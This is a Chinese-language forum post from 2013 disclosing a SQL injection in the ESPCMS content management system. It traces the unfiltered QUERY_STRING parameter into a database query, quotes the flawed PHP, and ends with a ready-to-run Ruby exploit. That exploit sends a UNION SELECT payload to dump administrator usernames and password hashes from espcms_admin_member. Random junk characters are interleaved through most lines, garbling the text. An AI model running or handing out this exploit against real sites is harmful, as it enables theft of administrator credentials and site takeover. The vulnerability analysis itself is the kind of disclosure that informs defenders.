0×0 漏洞概述0×1 漏洞细节 y) A9 T1 Z2 k% O8 A
0×2 PoC
+ w- }. ~) l7 H( U2 F u B7 ^& C' \# V$ I
0 |* v5 M* ?& `0 ^3 G; T6 M
: ]. _. \! |/ e9 C6 r+ ]0 F0×0 漏洞概述
, _; f2 y( {2 _; P! S5 @8 \1 `
+ a1 t P1 L( Q易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
9 `5 K- F7 h k0 z0 T/ ~其在处理传入的参数时考虑不严谨导致SQL注入发生
: y M7 G/ P# G& q
1 C, w2 a8 x; V2 l* K, Z7 t3 X) q+ B3 a# b2 F g2 {& f
0×1 漏洞细节
# m; z* p, ?3 |4 F j) D
4 ~3 L6 x1 Z4 ?" g4 \6 w4 f变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
; {9 C j& Y; v/ k2 l3 j& {9 `正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
# d. Z/ m+ v9 O+ C8 E" F而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。( W2 {# J0 Q) M, G' b! `
6 ?% r7 n8 X& y, u' d
在/interface/3gwap_search.php文件的in_result函数中:
+ ~; U! H9 G1 p1 _' Y3 Q7 N$ Q
2 M3 B$ ~3 |& ^ L( E* y& v% z
7 B* g, v# B: t0 s
2 t' z. `( r3 Y4 K- K function in_result() {
+ s4 I3 M+ e$ c$ I# v3 [ ... ... ... ... ... ... ... ... ...
/ W" c1 y9 {' ^ $urlcode = $_SERVER[ 'QUERY_STRING '];
# m3 t. T. ]! p+ v parse_str(html_entity_decode($urlcode), $output);
8 A3 ^! ^* ?( a+ d6 w
: b/ { |! r; n, L" o( r2 T! e ... ... ... ... ... ... ... ... ...3 t% E+ ?" R2 U: g& F3 b1 E9 T
if (is_array($output['attr' ]) && count($output['attr']) > 0) {- i! L3 m! e4 M3 v0 l* \
9 \4 r4 r1 ` w9 a! U$ @ $db_table = db_prefix . 'model_att';" [" }( F8 z- _ c
P' _4 H. z' b/ U1 M) M
foreach ($output['attr' ] as $key => $value) {3 H, B3 k% y& G
if ($value) {
5 ^/ j0 ]0 m8 \4 n5 G+ `- L0 ~4 H% Q x& D, v$ U
$key = addslashes($key);3 o9 k7 p' U# I- q- i: R1 r
$key = $this-> fun->inputcodetrim($key);
& c @$ a7 }4 Q8 S7 s $db_att_where = " WHERE isclass=1 AND attrname='$key'";# @2 A& E9 M% ?2 `7 r4 I
$countnum = $this->db_numrows($db_table, $db_att_where);. L4 y$ B8 |- ^: j5 t) e
if ($countnum > 0) {, @/ [& B3 @5 E! ]6 m
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
% Y* v" v' `4 K5 \- \) p# B0 f }% p5 T& C. L! D7 `; O
}! @. o: z+ s9 b0 l
}
9 D& D* @2 J! i% r }8 ?% M8 \1 s' h' [0 |% r
if (!empty ($keyword) && empty($keyname)) {9 M# E0 f. c; C: U5 A
$keyname = 'title';
1 _2 U3 I: M; j3 t $db_where.= " AND a.title like '%$keyword%'" ;) W. B% l; w# v1 v* O
} elseif (!empty ($keyword) && !empty($keyname)) {! |0 t7 T2 P) f* ?
$db_where.= " AND $keyname like '% $keyword%'";
( L# Z- h# h: O: q$ Y2 Z, H }
# {( Y6 U" Z# y, d' W $pagemax = 15;
7 W6 k0 w6 R9 Y3 o! z8 g+ R ?& R: E* ~( p3 p8 g
$pagesylte = 1;5 g, f$ D' s, X7 I; ?
4 y+ z/ ~9 i! N* r: D R
if ($countnum > 0) {
! O) C" ]0 v8 r' x5 d5 }; \
/ ], C" s+ w: F9 |, i $numpage = ceil($countnum / $pagemax);; |) i- }" x) g) M- ^. p, i
} else {
0 \$ Y- V& a7 Y& S: Y; q# } ` $numpage = 1;/ {) s) ? ]9 L/ q0 L1 }
}' |: N: C# V4 e/ d
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;/ o; I4 J9 L+ ?
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);: o# E' ]5 t( [9 Y! ]: d
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
@% A/ `' i2 k: P7 _3 s ... ... ... ... ... ... ... ... ..." H8 r. I. o! @( ]5 A- Z0 A
}
, N* k/ y2 w- Y$ j F- |# o3 O& I+ Y8 R/ y( p2 M. T+ N$ O
8 q7 [ Q- X+ C8 [1 C: R% e' O. U/ w0×2 PoC8 T* |" d5 S/ f$ A
, x% g# @# m' V7 }/ P5 T6 P
) s. V# g8 {& z/ U) B
3 Q" y1 B3 ~6 h. F5 A; drequire "net/http"1 q( p$ M3 w3 `; }5 B1 n/ v& ~
# S) P- Y1 z6 V: ?. m( N6 a" udef request(method, url)
y0 B/ F5 \0 ?% |5 a; _ if method.eql?("get")- P2 b3 S% H4 K" q
uri = URI.parse(url)( z) j! D' ]! ]
http = Net::HTTP.new(uri.host, uri.port)7 H: g4 j* F* }* g+ {
response = http.request(Net::HTTP::Get.new(uri.request_uri))
* b6 J+ ?! D8 C7 z: [ return response/ Y u) {+ a9 q9 V3 Q
end
- \) J# n- P4 @; |3 S2 R/ k& uend
q* o& r- s9 }& S& H9 ]9 r" U5 J; @) g% p- B1 z6 _7 J
doc =<<HERE
( C7 O3 s7 Y2 i% c1 w& J3 p-------------------------------------------------------
* e" {; |/ J4 v: H$ a) fEspcms Injection Exploit7 B) t' o: f/ [. a( v% @' R
Author:ztz
/ P7 v- V) }! h2 n2 iBlog:http://ztz.fuzzexp.org/( N# u7 L# \, B. D+ x _, V
-------------------------------------------------------
1 d0 j# t& u% h3 b/ i, w
# {! U0 a1 ]3 p/ }% SHERE( J* C4 t" |! V8 h7 E2 ?
$ U: s$ Q( s2 q' n, W' O
usage =<<HERE
( B( g7 l. d/ h2 L% K) l) MUsage: ruby #{$0} host port path
* t5 G1 m) B T0 O) dexample: ruby #{$0} www.target.com 80 /1 d) ~4 N5 `- B4 r# t
HERE, q% Y6 N2 j. F$ N5 N
) u& h% Z( N0 wputs doc
3 q% a* d1 L- m& z8 p, wif ARGV.length < 3" _: ]% M& e1 D2 v- Y, ^ z
puts usage/ H* c+ \2 r; m T+ K0 A
else/ Z& U! Y2 B- J* f! B" h
$host = ARGV[0]9 g9 ^& A. X$ V; c" n, T( P
$port = ARGV[1]% m' W7 }( H0 P- c3 n) u7 g5 L) G
$path = ARGV[2] Q w7 v6 J6 [
1 \( q' q+ |* K
puts "send request...", i/ H3 e; e1 h2 g) U
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&' l6 P' S4 O2 u, x3 M0 m
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
0 f! U4 B5 `/ E2 V3 X- u,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
) N# s7 `) v2 d3 ]8 j' B+ C3 s3 w7 O,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
- I; z8 X. z# Z' c response = request("get", url)
, i7 M/ O" N% B& x result = response.body.scan(/\w+&\w{32}/)/ F0 S! b' g \! d% Z
puts result- p( F' L! ` w' Y
end
0 K$ j% [; c+ Z7 Z& @
" ~1 P5 F* S+ a# D3 _$ W$ a |
发表于 2013-7-27 18:31:52
收藏
支持
反对